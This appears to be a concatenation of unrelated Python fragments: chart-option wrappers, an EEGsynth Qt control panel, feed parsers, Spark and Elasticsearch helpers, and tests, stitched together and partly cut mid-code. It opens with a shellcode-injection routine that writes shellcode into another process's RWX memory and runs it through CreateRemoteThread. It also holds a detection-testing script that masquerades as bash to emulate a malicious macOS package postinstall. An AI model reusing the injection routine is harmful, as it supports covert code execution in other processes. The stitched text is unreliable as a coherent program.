        VirtualAllocEx.restype = LPVOID
        VirtualAllocEx.argtypes = (HANDLE, LPVOID, DWORD, DWORD, DWORD)
        WriteProcessMemory = ctypes.windll.kernel32.WriteProcessMemory
        WriteProcessMemory.restype = BOOL
        WriteProcessMemory.argtypes = (HANDLE, LPVOID, LPCVOID, DWORD, DWORD)
        CreateRemoteThread = ctypes.windll.kernel32.CreateRemoteThread
        CreateRemoteThread.restype = HANDLE
        # NOTE(review): LPSECURITY_ATTRIBUTES and LPTHREAD_START_ROUTINE are
        # undefined names here (NameError) — not part of ctypes.wintypes.
        CreateRemoteThread.argtypes = (HANDLE, LPSECURITY_ATTRIBUTES, DWORD, LPTHREAD_START_ROUTINE, LPVOID, DWORD, DWORD)
        lpBuffer = VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
        print(f'[+] - Allocated remote memory at {hex(lpBuffer)}')
        res = WriteProcessMemory(process_handle, lpBuffer, shellcode, shellcode_length, 0)
        if (res > 0):
            print('[+] - Shellcode written.')
            CreateRemoteThread(process_handle, None, 0, lpBuffer, 0, 0, 0)
            print('[+] - Shellcode Injection, done.')
def extractTintinWordpressCom(item):
    """Map a tintin.wordpress.com feed item to a release message.

    Returns None for previews or items without chapter/volume info, False
    when nothing matches, otherwise the built release message.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if (not (chp or vol)) or ('preview' in item['title'].lower()):
        return None
    # Untagged posts fall back to title-substring matching.
    if item['tags'] == ['Uncategorized']:
        titlemap = [('The Legend of Divine Mystics- Chapter ', 'The Legend of Divine Mystics', 'translated'), ('Tensei Shoujo no Rirekisho', 'Tensei Shoujo no Rirekisho', 'translated'), ('Master of Dungeon', 'Master of Dungeon', 'oel')]
        lowered_title = item['title'].lower()
        for titlecomponent, name, tl_type in titlemap:
            if titlecomponent.lower() in lowered_title:
                return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class OptionSeriesLollipopSonificationDefaultinstrumentoptionsMappingTremoloSpeed(Options):
    """Option wrapper for the Highcharts
    ``series.lollipop.sonification.defaultInstrumentOptions.mapping.tremolo.speed``
    configuration subtree.

    NOTE(review): each accessor below is defined twice — a no-arg getter and a
    one-arg setter with the same name.  As written the second definition
    shadows the first; presumably ``@property`` / ``@<name>.setter``
    decorators were stripped from this generated file — confirm against the
    generator that produced it.
    """

    def mapFunction(self):
        # Getter: configured mapping function (default None).
        return self._config_get(None)

    def mapFunction(self, value: Any):
        # Setter: store a raw (non-JavaScript) value.
        self._config(value, js_type=False)

    def mapTo(self):
        # Getter: data property the mapping points at (default None).
        return self._config_get(None)

    def mapTo(self, text: str):
        # Setter: store the target property name.
        self._config(text, js_type=False)

    def max(self):
        # Getter: upper bound of the mapped range (default None).
        return self._config_get(None)

    def max(self, num: float):
        # Setter: store the upper bound.
        self._config(num, js_type=False)

    def min(self):
        # Getter: lower bound of the mapped range (default None).
        return self._config_get(None)

    def min(self, num: float):
        # Setter: store the lower bound.
        self._config(num, js_type=False)

    def within(self):
        # Getter: unit the min/max range is expressed in (default None).
        return self._config_get(None)

    def within(self, value: Any):
        # Setter: store the range unit.
        self._config(value, js_type=False)
class Window(QWidget):
def __init__(self):
super(Window, self).__init__()
self.setGeometry(winx, winy, winwidth, winheight)
self.setStyleSheet('background-color:black;')
self.setWindowTitle(patch.getstring('display', 'title', default='EEGsynth inputcontrol'))
self.drawmain()
def drawpanel(self, panel, list):
for item in list:
try:
key = ('%s.%s' % (prefix, item[0]))
val = patch.redis.get(key)
try:
val = float(val)
if ((item[1] == 'slider') or (item[1] == 'dial')):
val = EEGsynth.rescale(val, slope=output_scale, offset=output_offset, reverse=True)
elif ((item[1] == 'slap') or (item[1] == 'push')):
val = 0
elif (item[1] == 'toggle1'):
val = int(((1.0 * val) / 127.0))
elif (item[1] == 'toggle2'):
val = int(((2.0 * val) / 127.0))
elif (item[1] == 'toggle3'):
val = int(((3.0 * val) / 127.0))
elif (item[1] == 'toggle4'):
val = int(((4.0 * val) / 127.0))
elif (item[1] == 'text'):
val = EEGsynth.rescale(val, slope=output_scale, offset=output_offset)
monitor.info(('%s = %g' % (key, val)))
except ValueError:
val = val
monitor.info(('%s = %s' % (key, val)))
except:
val = 0
if (item[1] == 'label'):
l = QtWidgets.QLabel(item[0])
l.setAlignment(QtCore.Qt.AlignHCenter)
l.setStyleSheet('color: rgb(200,200,200);')
panel.addWidget(l)
elif (item[1] == 'placeholder'):
l = QtWidgets.QLabel('')
panel.addWidget(l)
elif (item[1] == 'text'):
t = QLineEditDrop()
t.name = item[0]
t.type = item[1]
if isinstance(val, str):
t.setText(val)
else:
t.setText(('%g' % val))
t.setAlignment(QtCore.Qt.AlignHCenter)
t.setStyleSheet('background-color: rgb(64,64,64); color: rgb(200,200,200);')
t.editingFinished.connect(self.changevalue)
t.textChanged.connect(self.changevalue)
l = QtWidgets.QLabel(t.name)
l.setAlignment(QtCore.Qt.AlignHCenter)
l.setStyleSheet('color: rgb(200,200,200);')
tl = QtWidgets.QVBoxLayout()
tl.addWidget(t)
tl.setAlignment(t, QtCore.Qt.AlignHCenter)
tl.addWidget(l)
tl.setAlignment(l, QtCore.Qt.AlignHCenter)
panel.addLayout(tl)
elif (item[1] == 'slider'):
s = QtWidgets.QSlider(QtCore.Qt.Vertical)
s.name = item[0]
s.type = item[1]
s.setMinimum(0)
s.setMaximum(127)
s.setValue(int(val))
s.setTickInterval(1)
s.setTickPosition(QtWidgets.QSlider.NoTicks)
s.setStyleSheet('background-color: rgb(64,64,64);')
s.valueChanged.connect(self.changevalue)
l = QtWidgets.QLabel(s.name)
l.setAlignment(QtCore.Qt.AlignHCenter)
l.setStyleSheet('color: rgb(200,200,200);')
sl = QtWidgets.QVBoxLayout()
sl.addWidget(s)
sl.setAlignment(s, QtCore.Qt.AlignHCenter)
sl.addWidget(l)
sl.setAlignment(l, QtCore.Qt.AlignHCenter)
panel.addLayout(sl)
elif (item[1] == 'dial'):
s = QtWidgets.QDial()
s.name = item[0]
s.type = item[1]
s.setMinimum(0)
s.setMaximum(127)
s.setValue(val)
s.setStyleSheet('background-color: rgb(64,64,64);')
s.valueChanged.connect(self.changevalue)
l = QtWidgets.QLabel(s.name)
l.setAlignment(QtCore.Qt.AlignHCenter)
l.setStyleSheet('color: rgb(200,200,200);')
sl = QtWidgets.QVBoxLayout()
sl.addWidget(s)
sl.setAlignment(s, QtCore.Qt.AlignHCenter)
sl.addWidget(l)
sl.setAlignment(l, QtCore.Qt.AlignHCenter)
panel.addLayout(sl)
elif (item[1] in ['push', 'slap', 'toggle1', 'toggle2', 'toggle3', 'toggle4']):
b = QtWidgets.QPushButton(item[0])
b.name = item[0]
b.type = item[1]
b.value = val
if ((item[1] == 'slap') or (item[1] == 'push')):
b.pressed.connect(self.changevalue)
b.released.connect(self.changevalue)
else:
b.pressed.connect(self.changevalue)
b.released.connect(self.changecolor)
self.setcolor(b)
panel.addWidget(b)
def drawmain(self):
    """Construct the main control-panel layout from the patch configuration.

    The window is split into a left part (horizontal strips of controls)
    and a right part (vertical strips).  Sections named 'slider' and
    'row1'..'row16' are placed on the left; 'button' and
    'column1'..'column16' on the right.
    """
    leftlayout = QtWidgets.QVBoxLayout()
    rightlayout = QtWidgets.QHBoxLayout()
    mainlayout = QtWidgets.QHBoxLayout()
    mainlayout.addLayout(leftlayout)
    mainlayout.addLayout(rightlayout)
    self.setLayout(mainlayout)

    # Left side: the 'slider' section, then row1..row16, each section
    # rendered as one horizontal strip of controls.
    for section in ['slider'] + ['row%d' % (i + 1) for i in range(16)]:
        if patch.config.has_section(section):
            strip = QtWidgets.QHBoxLayout()
            self.drawpanel(strip, patch.config.items(section))
            leftlayout.addLayout(strip)

    # Right side: the 'button' section, then column1..column16, each
    # section rendered as one vertical strip of controls.
    for section in ['button'] + ['column%d' % (i + 1) for i in range(16)]:
        if patch.config.has_section(section):
            strip = QtWidgets.QVBoxLayout()
            self.drawpanel(strip, patch.config.items(section))
            rightlayout.addLayout(strip)
def changecolor(self):
    """Qt slot: recolor the widget that emitted the signal."""
    self.setcolor(self.sender())
def changevalue(self):
    """Qt slot: read the emitting widget's new value, recolor it, and
    publish the (rescaled) value under the key '<prefix>.<name>'.
    """
    target = self.sender()
    publish = True
    # Number of "on" steps for each button-like control type: a control
    # with N steps cycles through values 0..N and emits value*127/N.
    steps = {'slap': 1, 'push': 1, 'toggle1': 1,
             'toggle2': 2, 'toggle3': 3, 'toggle4': 4}
    if target.type in ('slider', 'dial'):
        val = target.value()
    elif target.type == 'text':
        # Numeric text is normalized back into the field; anything else is
        # passed through verbatim as a string.
        try:
            val = float(target.text())
            target.setText('%g' % val)
        except ValueError:
            val = target.text()
    else:
        n = steps[target.type]
        target.value = (target.value + 1) % (n + 1)
        val = (target.value * 127) / n
        if target.type == 'slap':
            # A slap only publishes on activation, not on release.
            publish = val > 0
    self.setcolor(target)
    if publish:
        key = '%s.%s' % (prefix, target.name)
        if target.type != 'text':
            val = EEGsynth.rescale(val, slope=output_scale, offset=output_offset)
        patch.setvalue(key, val)
        monitor.update(key, val)
def setcolor(self, target):
    """Set the background color of a button-like control to match its value.

    slap           : amber when active (value 1), grey otherwise
    push / toggle1 : red when active (value 1), grey otherwise
    toggle2..4     : values 1..N map onto red, yellow, green, amber; 0 is grey
    Controls of any other type (slider, dial, text) are left untouched.
    """
    border = 'border: 1px solid gray; border-radius: 4px; padding: 4px 4px;'
    grey = 'background-color: rgb(250,250,250); ' + border
    red = 'background-color: rgb(255,0,0); ' + border
    yellow = 'background-color: rgb(250,250,60); ' + border
    green = 'background-color: rgb(60,200,60); ' + border
    amber = 'background-color: rgb(250,190,45); ' + border
    if target.type == 'slap':
        target.setStyleSheet(amber if target.value == 1 else grey)
    elif target.type in ('toggle1', 'push'):
        target.setStyleSheet(red if target.value == 1 else grey)
    elif target.type in ('toggle2', 'toggle3', 'toggle4'):
        # Color ramp indexed by the control value; values outside 1..N fall
        # back to grey, exactly as the original if/elif chains did.
        ramp = [grey, red, yellow, green, amber]
        nsteps = int(target.type[-1])
        if 1 <= target.value <= nsteps:
            target.setStyleSheet(ramp[target.value])
        else:
            target.setStyleSheet(grey)
    # BUGFIX: the original ended with an unreachable
    # `elif type in ('slap', 'push')` branch -- both types are already
    # handled above -- so that dead code has been removed (no behavior change).
class OptionSeriesGaugeSonificationDefaultspeechoptionsActivewhen(Options):
    """Options wrapper for the `activeWhen` block of a gauge series'
    sonification default speech options.

    NOTE(review): every option below is defined twice under the same name --
    a zero-argument getter followed by a one-argument setter.  Without
    `@property` / `@<name>.setter` decorators, the second `def` shadows the
    first, leaving only the setter callable.  The same pattern appears
    elsewhere in this file, which suggests the decorators were stripped from
    the original source -- confirm against the upstream library before
    relying on the getters.
    """

    def crossingDown(self):
        # Getter for the `crossingDown` option (None when unset).
        return self._config_get(None)

    def crossingDown(self, num: float):
        # Setter for the `crossingDown` option.
        self._config(num, js_type=False)

    def crossingUp(self):
        # Getter for the `crossingUp` option (None when unset).
        return self._config_get(None)

    def crossingUp(self, num: float):
        # Setter for the `crossingUp` option.
        self._config(num, js_type=False)

    def max(self):
        # Getter for the `max` option (None when unset).
        return self._config_get(None)

    def max(self, num: float):
        # Setter for the `max` option.
        self._config(num, js_type=False)

    def min(self):
        # Getter for the `min` option (None when unset).
        return self._config_get(None)

    def min(self, num: float):
        # Setter for the `min` option.
        self._config(num, js_type=False)

    def prop(self):
        # Getter for the `prop` option (None when unset).
        return self._config_get(None)

    def prop(self, text: str):
        # Setter for the `prop` option.
        self._config(text, js_type=False)
def run_cmd(app, cmd):
    """Run `cmd` through `app` and capture its output.

    Temporarily replaces the application's stdout and the process-wide
    sys.stdout / sys.stderr with StdSim buffers, executes the command, then
    restores the streams and returns the normalized output.

    Parameters:
        app: application under test; must expose `stdout` and
            `onecmd_plus_hooks` (cmd2-style interface -- confirm).
        cmd: the command line to execute.

    Returns:
        Tuple of (normalized stdout, normalized stderr).
    """
    saved_sysout = sys.stdout
    sys.stdout = app.stdout
    # Simulated streams wrapping the real ones; StdSim presumably records
    # everything written through it (project helper -- verify).
    copy_cmd_stdout = StdSim(app.stdout)
    copy_stderr = StdSim(sys.stderr)
    try:
        app.stdout = copy_cmd_stdout
        with redirect_stdout(copy_cmd_stdout):
            with redirect_stderr(copy_stderr):
                app.onecmd_plus_hooks(cmd)
    finally:
        # Restore the app's underlying stream and the process-wide stdout
        # even if the command raised.
        app.stdout = copy_cmd_stdout.inner_stream
        sys.stdout = saved_sysout
    out = copy_cmd_stdout.getvalue()
    err = copy_stderr.getvalue()
    # Echo the captured output to the (now restored) real stdout so it
    # remains visible in logs.
    print(out)
    print(err)
    return (normalize(out), normalize(err))
class Database_update():
    """Thin wrapper around the `apiscan` MongoDB database.

    Connection parameters default to localhost:27017 and can be overridden
    through the MONGO_PORT_27017_TCP_ADDR / MONGO_PORT_27017_TCP_PORT
    environment variables (the names Docker container links export).
    """

    def __init__(self):
        mongo_host = 'localhost'
        mongo_port = 27017
        # Fail fast (1 ms) when no server can be selected.
        maxSevSelDelay = 1
        if 'MONGO_PORT_27017_TCP_ADDR' in os.environ:
            mongo_host = os.environ['MONGO_PORT_27017_TCP_ADDR']
        if 'MONGO_PORT_27017_TCP_PORT' in os.environ:
            mongo_port = int(os.environ['MONGO_PORT_27017_TCP_PORT'])
        self.client = MongoClient(mongo_host, mongo_port, serverSelectionTimeoutMS=maxSevSelDelay)
        self.db = self.client.apiscan

    def fetch_records(self):
        """Print every vulnerability record, stripped of its Mongo `_id`."""
        # A pymongo cursor is always truthy, so the original `if records:`
        # guard was a no-op and has been dropped.
        for data in self.db.vulnerabilities.find({}):
            data.pop('_id')
            print(data)

    def insert_record(self, data):
        """Insert a single vulnerability document."""
        # `Collection.insert` was removed in pymongo 4; insert_one is the
        # modern single-document equivalent.  The original
        # `except Exception as e: raise e` added nothing and was removed.
        self.db.vulnerabilities.insert_one(data)

    def update_record(self, find, update):
        """Apply `update` to the first vulnerability document matching `find`."""
        # `Collection.update` (removed in pymongo 4) modified a single
        # document by default, so update_one preserves its behavior.
        self.db.vulnerabilities.update_one(find, update)

    def update_scan_record(self, find, update):
        """Apply `update` to the first scan-id document matching `find`."""
        self.db.scanids.update_one(find, update)
def extractTaptrans(item):
    """Classify a 'Taptrans' feed item for release parsing.

    Returns None for items to be skipped (no volume/chapter/fragment
    information, previews, or manga/doujinshi tagged releases) and False
    when the item matched no known series (no release message built).
    """
    vol, chp, frag, _postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol or frag) or 'preview' in item['title'].lower():
        return None
    if any(tag in item['tags'] for tag in ('Manga', 'Doujinshi')):
        return None
    return False
def get_registry_set_info_key_extra_details(metadata, event, extra_detail_io, details_info):
    """Fill in the extra details of a registry SetInfoKey event.

    Decodes the information class name and, when a payload is present,
    the class-specific value that was written to the key.
    """
    event.category = 'Write Metadata'
    event.details['KeySetInformationClass'] = RegistryKeySetInformationClass.get(details_info['key_set_information_class'], '<Unknown: {}>'.format(details_info['key_set_information_class']))
    event.details['Length'] = details_info['length']
    if details_info['length'] > 0:
        if event.details['KeySetInformationClass'] == 'KeyWriteTimeInformation':
            event.details['LastWriteTime'] = read_filetime(extra_detail_io)
        elif event.details['KeySetInformationClass'] == 'KeyWow64FlagsInformation':
            event.details['Wow64Flags'] = read_u32(extra_detail_io)
        elif event.details['KeySetInformationClass'] == 'KeySetHandleTagsInformation':
            # BUGFIX: this branch previously re-tested 'KeyWriteTimeInformation'
            # (copy-paste slip) and was unreachable.  HandleTags belongs to the
            # KeySetHandleTagsInformation member of KEY_SET_INFORMATION_CLASS --
            # confirm the exact spelling against RegistryKeySetInformationClass.
            event.details['HandleTags'] = read_u32(extra_detail_io)
class SlaPolicy(BaseObject):
    """Zendesk SLA policy API object.

    Unknown keyword arguments become attributes; attributes still None after
    construction are removed from the dirty set so they are not serialized
    back to the API.
    """

    def __init__(self, api=None, created_at=None, description=None, filter=None, id=None, policy_metrics=None, position=None, title=None, updated_at=None, url=None, **kwargs):
        self.api = api
        self.created_at = created_at
        self.description = description
        self.filter = filter
        self.id = id
        self.policy_metrics = policy_metrics
        self.position = position
        self.title = title
        self.updated_at = updated_at
        self.url = url
        for key, value in kwargs.items():
            setattr(self, key, value)
        # Drop unset attributes from the dirty-tracking set maintained by
        # BaseObject so they are not sent on update.
        for key in self.to_dict():
            if getattr(self, key) is None:
                try:
                    self._dirty_attributes.remove(key)
                except KeyError:
                    continue

    @property
    def created(self):
        """`created_at` parsed into a datetime, or None when unset.

        BUGFIX: without @property, the setter below shadowed this getter,
        making it unreachable; the property/setter pair has been restored.
        """
        if self.created_at:
            return dateutil.parser.parse(self.created_at)

    @created.setter
    def created(self, created):
        if created:
            self.created_at = created

    @property
    def updated(self):
        """`updated_at` parsed into a datetime, or None when unset."""
        if self.updated_at:
            return dateutil.parser.parse(self.updated_at)

    @updated.setter
    def updated(self, updated):
        if updated:
            self.updated_at = updated
def d64_to_coord(d64):
    """Decode a base-64 ("d64") encoded coordinate string into a number.

    Each character is a digit in the module-level `alphabet`; the decoded
    integer is divided by the module-level `precision`, negated when the
    string carries a leading '-'.

    Raises:
        ValueError: if a character is not present in the alphabet.
    """
    divisor, digits = precision, d64
    if d64.startswith('-'):
        divisor = -divisor
        digits = digits[1:]
    number = 0
    for digit in digits:
        value = alphabet.find(digit)
        if value < 0:
            # BUGFIX: the original formatted `value` into the message, which
            # is always -1 here; report the offending character instead.
            raise ValueError('Invalid d64 digit {!r} in {!r}'.format(digit, d64))
        number = (number * 64) + value
    return number / divisor
def diff(left: DataFrame, right: DataFrame, unique_key_col='id', compare_cols=None, include_unchanged_rows=False) -> DataFrame:
    """Compare two Spark DataFrames row-by-row, joined on `unique_key_col`.

    The result carries a leading 'diff' column:
      'I' inserted (key only in `right`), 'D' deleted (key only in `left`),
      'C' changed (some compared column differs), 'N' unchanged,
    followed by both key columns and the left/right values of each compared
    column, interleaved.

    Parameters:
        left, right: the DataFrames to compare.
        unique_key_col: join key; never included in the value comparison.
        compare_cols: columns to compare; when falsy, all columns are
            compared and both frames must have identical column sets.
        include_unchanged_rows: keep 'N' rows when True.
    """
    if (not compare_cols):
        # No explicit column list: both sides must agree exactly.
        if (set(left.schema.names) != set(right.schema.names)):
            raise ValueError(f'''The two DataFrames to compare do not contain the same columns.
left cols (in alpha order): {sorted(set(left.schema.names))}
right cols (in alpha order): {sorted(set(right.schema.names))}''')
        compare_cols = left.schema.names
    else:
        # Keep only the requested columns that actually exist on the left.
        compare_cols = [c for c in left.schema.names if (c in compare_cols)]
    if (unique_key_col in compare_cols):
        compare_cols.remove(unique_key_col)
    # One WHEN clause per compared column, using the null-safe
    # IS DISTINCT FROM comparison.
    distinct_stmts = ' '.join([f"WHEN l.{c} IS DISTINCT FROM r.{c} THEN 'C'" for c in compare_cols])
    # The synthetic 'exists' marker columns distinguish inserts and deletes
    # after the full outer join.
    compare_expr = f'''
CASE
WHEN l.exists IS NULL THEN 'I'
WHEN r.exists IS NULL THEN 'D'
{distinct_stmts}
ELSE 'N'
END
'''
    differences = left.withColumn('exists', lit(1)).alias('l').join(right.withColumn('exists', lit(1)).alias('r'), (left[unique_key_col] == right[unique_key_col]), 'fullouter').withColumn('diff', expr(compare_expr))
    # diff flag, then both key columns, then l/r values of each compared
    # column interleaved for side-by-side inspection.
    cols_to_show = ((['diff'] + [f'l.{unique_key_col}', f'r.{unique_key_col}']) + list(chain(*zip([f'l.{c}' for c in compare_cols], [f'r.{c}' for c in compare_cols]))))
    differences = differences.select(*cols_to_show)
    if (not include_unchanged_rows):
        differences = differences.where("diff != 'N'")
    return differences
# NOTE(review): the decorator line was mangled to `.django_db(...)` in this
# copy; restored as the standard pytest-django marker -- confirm against the
# original file's imports.
@pytest.mark.django_db(transaction=True)
def test_missing_def_code():
    """The loader must raise when the raw DEF Code file has a bad record."""
    try:
        missing_code_test_data()
    except RuntimeError as e:
        assert str(e) == '1 problem(s) have been found with the raw DEF Code file. See log for details.'
    else:
        assert False, 'Expected a RuntimeError to occur.'
# NOTE(review): the decorator line was mangled to `_os(...)` in this copy;
# restored per the detection-rules RTA convention `@common.requires_os` --
# confirm against the original file.
@common.requires_os(*metadata.platforms)
def main():
    """Emulate payload execution from a macOS package postinstall script.

    Creates a fake `bash` masquerade binary, uses it to chmod/copy a
    temporary script into place as postinstall child processes, then removes
    the artifacts it created.
    """
    dest_file = '/tmp/test.py'
    source_file = '/tmp/test.txt'
    masquerade = '/Users/bash'
    common.create_macos_masquerade(masquerade)
    command = f'chmod +x {source_file}'
    common.log('Launching fake bash commands to execute chmod on file via pkg install')
    with common.temporary_file('testing', source_file):
        common.execute([masquerade, 'childprocess', command, 'childprocess', f'cp {source_file} {dest_file}', 'childprocess', '/tmp/PKInstallSandbox.*/Scripts/*/postinstall'], timeout=10, kill=True)
    common.remove_file(masquerade)
    common.remove_file(dest_file)
def test_splitting_by_suite(tmp_path):
    """Adding a multi-suite results file to the repo splits it per suite."""
    def load_json(path):
        with open(path, 'r') as fp:
            return json.load(fp)

    def bench_names(payload):
        return sorted(entry['metadata']['name'] for entry in payload['benchmarks'])

    git_commit = '4cd693d'
    datadir = 'benchmark-results'
    repo_root = tmp_path / 'ideas'
    base_filename = NEW_FILENAME.stem

    github_target = _utils.GitHubTarget.from_url(IDEAS_GIT_URL)
    github_target.ensure_local(str(repo_root))
    results_repo = _pyperformance.PyperfResultsRepo.from_remote(IDEAS_GIT_URL, str(repo_root), datadir=datadir)

    # The input fixture contains all 62 benchmarks in one file.
    input_file = DATA_ROOT / f'{base_filename}.json'
    assert len(load_json(input_file)['benchmarks']) == 62

    results_file = _pyperformance.PyperfResultsFile(str(input_file)).read()
    assert results_file.suite == _pyperformance.PyperfUploadID.MULTI_SUITE
    results_repo.add(results_file, branch=git_commit, push=False)

    # After adding, the repo must hold 59 pyperformance + 3 pyston benchmarks.
    pyperf_payload = load_json(repo_root / datadir / f'{base_filename}-pyperformance.json')
    assert len(pyperf_payload['benchmarks']) == 59
    pyston_payload = load_json(repo_root / datadir / f'{base_filename}-pyston.json')
    assert len(pyston_payload['benchmarks']) == 3
    assert bench_names(pyston_payload) == ['json', 'pycparser', 'thrift']
class _ValueEditor(Editor):
    """TraitsUI editor that displays an arbitrary value as a read-only tree."""

    # When True, the displayed value tree is read-only.
    readonly = Bool(False)

    # Root node of the value tree; rebuilt on every editor update.
    root = Instance(RootNode)

    # The editor scrolls its content.
    scrollable = True

    def init(self, parent):
        """Create the embedded tree UI inside `parent`."""
        self.update_editor()
        editor = TreeEditor(auto_open=self.factory.auto_open, hide_root=True, editable=False, nodes=value_tree_nodes)
        self._ui = self.edit_traits(parent=parent, view=View(Item('root', show_label=False, editor=editor), kind='subpanel'))
        # Chain the sub-UI to the owning UI so teardown cascades correctly.
        self._ui.parent = self.ui
        self.control = self._ui.control

    def update_editor(self):
        """Rebuild the tree root from the current editor value."""
        self.root = RootNode(name='', value=self.value, readonly=self.readonly)

    def dispose(self):
        """Dispose the embedded UI before the regular editor teardown."""
        self._ui.dispose()
        super().dispose()

    def get_error_control(self):
        # Delegates to the embedded UI (note the plural helper name there).
        return self._ui.get_error_controls()
class FacetedSearch():
    """Declarative faceted search over an Elasticsearch index.

    Subclasses configure the class attributes below; instances are built
    from an optional free-text query, a mapping of facet filter values and
    a sort specification, and run via `execute`.
    """

    # Index to search; None means the default index.
    index = None
    # Restrict the search to these document types.
    doc_types = None
    # Fields targeted by the multi_match query and by highlighting.
    fields = None
    # Mapping of facet name -> facet instance, supplied by subclasses.
    facets = {}
    # Named connection to use.
    using = 'default'

    def __init__(self, query=None, filters=None, sort=()):
        # BUGFIX: `filters` previously defaulted to a shared mutable dict
        # ({}); default to None and substitute an empty mapping per call.
        self._query = query
        self._filters = {}
        self._sort = sort
        self.filter_values = {}
        for name, value in (filters or {}).items():
            self.add_filter(name, value)
        self._s = self.build_search()

    def count(self):
        """Number of hits matching the search."""
        return self._s.count()

    def __getitem__(self, k):
        # Slicing narrows the underlying search in place and returns self.
        self._s = self._s[k]
        return self

    def __iter__(self):
        return iter(self._s)

    def add_filter(self, name, filter_values):
        """Register filter value(s) for the facet called `name`."""
        # Normalize a scalar to a one-element list; None means "no filter".
        if not isinstance(filter_values, (tuple, list)):
            if filter_values is None:
                return
            filter_values = [filter_values]
        self.filter_values[name] = filter_values
        f = self.facets[name].add_filter(filter_values)
        if f is None:
            return
        self._filters[name] = f

    def search(self):
        """Construct the base Search object (no query/filters applied yet)."""
        s = Search(doc_type=self.doc_types, index=self.index, using=self.using)
        return s.response_class(FacetedResponse)

    def query(self, search, query):
        """Apply the free-text query, scoped to `self.fields` when configured."""
        if query:
            if self.fields:
                return search.query('multi_match', fields=self.fields, query=query)
            else:
                return search.query('multi_match', query=query)
        return search

    def aggregate(self, search):
        """Add one filtered aggregation per facet.

        Each facet's aggregation is filtered by all *other* active facet
        filters, so a facet's own selection does not collapse its buckets.
        """
        for f, facet in self.facets.items():
            agg = facet.get_aggregation()
            agg_filter = MatchAll()
            for field, filter in self._filters.items():
                if f == field:
                    continue
                agg_filter &= filter
            search.aggs.bucket('_filter_' + f, 'filter', filter=agg_filter).bucket(f, agg)

    def filter(self, search):
        """Apply the active facet filters as a post_filter."""
        if not self._filters:
            return search
        post_filter = MatchAll()
        for f in self._filters.values():
            post_filter &= f
        return search.post_filter(post_filter)

    def highlight(self, search):
        """Highlight the queried fields, stripping any '^boost' suffixes."""
        return search.highlight(*((f if ('^' not in f) else f.split('^', 1)[0]) for f in self.fields))

    def sort(self, search):
        """Apply the sort specification, when one was given."""
        if self._sort:
            search = search.sort(*self._sort)
        return search

    def build_search(self):
        """Assemble the full search: query, filters, highlight, sort, aggs."""
        s = self.search()
        s = self.query(s, self._query)
        s = self.filter(s)
        if self.fields:
            s = self.highlight(s)
        s = self.sort(s)
        self.aggregate(s)
        return s

    def execute(self):
        """Run the search and attach this faceted search to the response."""
        r = self._s.execute()
        r._faceted_search = self
        return r
class SQLTask(PythonTask[T]):
    """Base class for tasks whose body is a SQL query template.

    The template may reference task inputs as `{{ .inputs.<name> }}`;
    `interpolate_query` substitutes the runtime values.
    """

    # Matches `{{ .inputs.<name> }}`; group 1 is the whole expression,
    # group 2 the input name.
    _INPUT_REGEX = re.compile('({{\\s*.inputs.(\\w+)\\s*}})', re.IGNORECASE)

    def __init__(self, name: str, query_template: str, task_config: Optional[T]=None, task_type='sql_task', inputs: Optional[Dict[(str, Tuple[(Type, Any)])]]=None, metadata: Optional[TaskMetadata]=None, outputs: Optional[Dict[(str, Type)]]=None, **kwargs):
        super().__init__(task_type=task_type, name=name, interface=Interface(inputs=(inputs or {}), outputs=(outputs or {})), metadata=metadata, task_config=task_config, **kwargs)
        # Collapse newlines/tabs/runs of whitespace so the stored template
        # is a single normalized line.
        self._query_template = re.sub('\\s+', ' ', query_template.replace('\n', ' ').replace('\t', ' ')).strip()

    @property
    def query_template(self) -> str:
        """The normalized query template string.

        BUGFIX: the @property decorator was missing; `get_query` reads
        `self.query_template` as an attribute, so without the decorator it
        passed a bound method into `interpolate_query` and crashed.
        """
        return self._query_template

    def execute(self, **kwargs) -> Any:
        # SQL tasks are executed by an external engine, never locally.
        raise Exception('Cannot run a SQL Task natively, please mock.')

    def get_query(self, **kwargs) -> str:
        """Return the query with all input placeholders substituted."""
        return self.interpolate_query(self.query_template, **kwargs)

    @classmethod
    def interpolate_query(cls, query_template, **kwargs) -> Any:
        """Substitute `{{ .inputs.<name> }}` placeholders with kwargs values.

        BUGFIX: the first parameter is named `cls` but the @classmethod
        decorator was missing; it has been restored.

        Raises:
            ValueError: when a referenced input is missing from kwargs, or
                when kwargs contains inputs the template never references.
        """
        modified_query = query_template
        matched = set()
        for match in cls._INPUT_REGEX.finditer(query_template):
            expr = match.groups()[0]
            var = match.groups()[1]
            if var not in kwargs:
                raise ValueError(f'Variable {var} in Query (part of {expr}) not found in inputs {kwargs.keys()}')
            matched.add(var)
            val = kwargs[var]
            modified_query = modified_query.replace(expr, str(val))
        if len(matched) < len(kwargs.keys()):
            diff = set(kwargs.keys()).difference(matched)
            raise ValueError(f'Extra Inputs have no matches in query template - missing {diff}')
        return modified_query
class _IdentityDataflow():
DefinitionLocation = namedtuple('DefinitionLocation', ['block', 'definition'])
def __init__(self):
self._use_map: DefaultDict[(Variable, List[Instruction])] = defaultdict(list)
self._def_map: Dict[(Variable, _IdentityDataflow.DefinitionLocation)] = dict()
def parse_dataflow(self, instruction: Instruction, basic_block: BasicBlock):
for required_variable in instruction.requirements:
self._use_map[required_variable].append(instruction)
for defined_value in instruction.definitions:
self._def_map[defined_value] = self.DefinitionLocation(basic_block, instruction)
def get_usages(self, variable: Variable) -> Iterator[Instruction]:
(yield from self._use_map[variable])
def get_definition(self, variable: Variable) -> Optional[_IdentityDataflow.DefinitionLocation]:
return self._def_map.get(variable, None) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.